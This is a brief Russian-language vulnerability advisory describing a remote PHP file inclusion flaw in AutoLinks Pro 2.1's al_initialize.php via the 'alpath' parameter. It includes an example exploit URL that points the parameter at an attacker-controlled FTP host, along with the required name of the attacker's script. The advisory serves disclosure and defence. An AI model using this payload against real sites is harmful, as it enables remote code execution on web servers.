Программа: AutoLinks Pro 2.1 

Уязвимость позволяет удаленному пользователь выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера.
Уязвимость существует в сценарии ‘autolinks/al_initialize.php’ при обработке входных данных в параметре ‘alpath’ при включенной опции register_globals в конфигурационном файле php.ini. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера. 

Пример:

http://[target]/al_initialize.php?alpath=ftp://[attacker]/

Примечание: Сценарий атакующего должен быть назван ‘al_functions.php’.



Оставить мнение